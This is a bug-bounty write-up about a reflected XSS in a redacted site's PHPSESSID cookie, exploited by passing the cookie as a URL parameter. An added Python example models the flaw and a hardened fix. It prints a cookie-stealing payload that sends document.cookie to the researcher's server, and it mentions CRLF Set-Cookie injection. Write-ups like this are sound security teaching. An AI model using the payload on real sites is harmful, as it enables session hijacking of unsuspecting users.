Cookie-based injection XSS made exploitable without exploiting other vulns

medium.com · devanshbatham/Awesome-Bugbounty-Writeups · 22 hours ago · bug-bounty
AI Summary

A researcher discovered a cookie-based XSS vulnerability that became exploitable by moving the vulnerable cookie parameter into URL GET parameters, allowing them to exfiltrate session cookies without needing to chain additional vulnerabilities like CRLF injection.

Entities
Utkarsh Agrawal Burp Suite PHPSESSID
Cookie-based-injection XSS making exploitable with-out exploiting other Vulns. | by Utkarsh Agrawal

Utkarsh Agrawal · ~2 min read · October 22, 2018 (Updated: October 22, 2018) · Free: Yes

Hi all,

This is a short blog post about making a cookie-based XSS exploitable. I was testing a site, [redacted.com] (I can't name it for obvious reasons), in Burp's Repeater tab, working on a parameter that was reflected on the HTML page but encoded.

URL: http://[redacted.com]/path/file.php?f=a*&location=12 (the * marks the injection point I was trying)

I kept trying to bypass the filter by injecting different payloads again and again (that is, sending request after request), and all of a sudden another parameter was reflected on the page: a cookie parameter that had not been reflected before. How? Frankly, I don't know. I was genuinely surprised that this new parameter was suddenly reflected when it hadn't been before.

Moving on, I started checking whether that cookie parameter was injectable, and to my surprise it was. Now I had an XSS injection point, but the main question was: how can I exploit it against users? To make a cookie-based XSS injection exploitable you would normally need to exploit another vulnerability, i.e. CRLF injection (because you can then try %0d%0aSet-Cookie). I looked for one but didn't find it.

Next I had an idea: what if I placed that cookie parameter into the URL GET parameters, like this:

http://[redacted.com]/path/file.php?f=a&location=12&PHPSESSID={payload}

payload: a');document.location="http://myserver/"%2bdocument.cookie;test('

And yes, it worked the same way. Wow! I got all the cookies on my server.

I quickly reported it to the team. :) It was a good case for me. And one thing I learned is that if you find a cookie-based injection, you should also check by moving the parameter from the Cookie header to a URL parameter, just like you would convert POST to GET to make exploitation easier.

Thanks

#javascript #xss-attack #html #bug-bounty #cookies
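To show why moving the parameter from the Cookie header to the query string can work, here is an added example in Python (not the author's code) that models a server building one merged parameter map in which a GET value overrides a cookie of the same name and then reflecting the session id unencoded, beside a hardened version that reads the session id only from the Cookie header and HTML-encodes output. The merged-parameter mechanism is an assumption about the redacted target, and the sample cookie and query string are constructed.

```python
"""Added model of the cookie-to-GET reflection (not the author's code).
Assumption: the target built one merged parameter map in which a
query-string value overrides a cookie of the same name (a $_REQUEST-style
merge) and echoed PHPSESSID into the HTML unencoded."""
import html
from http.cookies import SimpleCookie
from urllib.parse import parse_qs

SESSION_PARAM = "PHPSESSID"


def merged_params(query: str, cookie_header: str) -> dict:
    """Cookie values first, then GET values overwrite them (GET wins)."""
    params = {}
    cookies = SimpleCookie()
    cookies.load(cookie_header)
    for name, morsel in cookies.items():
        params[name] = morsel.value
    for name, values in parse_qs(query, keep_blank_values=True).items():
        params[name] = values[0]
    return params


def render_vulnerable(query: str, cookie_header: str) -> str:
    """The bug from the post: the session id is reflected without encoding,
    and because GET wins the merge, a URL parameter controls what is echoed."""
    sid = merged_params(query, cookie_header).get(SESSION_PARAM, "")
    return f"<p>session: {sid}</p>"


def render_hardened(query: str, cookie_header: str) -> str:
    """Fix: read the session id only from the Cookie header (never from the
    query string) and HTML-encode anything reflected into the page."""
    cookies = SimpleCookie()
    cookies.load(cookie_header)
    sid = cookies[SESSION_PARAM].value if SESSION_PARAM in cookies else ""
    return f"<p>session: {html.escape(sid, quote=True)}</p>"


# Constructed sample input: a benign session cookie and a query string that
# smuggles a marker tag through the same parameter name.
SAMPLE_COOKIE = "PHPSESSID=abc123def456; theme=dark"
SAMPLE_QUERY = "f=a&location=12&PHPSESSID=<b>injected</b>"

if __name__ == "__main__":
    print(render_vulnerable(SAMPLE_QUERY, SAMPLE_COOKIE))  # marker lands raw
    print(render_hardened(SAMPLE_QUERY, SAMPLE_COOKIE))    # cookie value only
```

The hardened version also encodes a hostile value that arrives in the Cookie header itself, so the fix does not depend on which channel the attacker reaches.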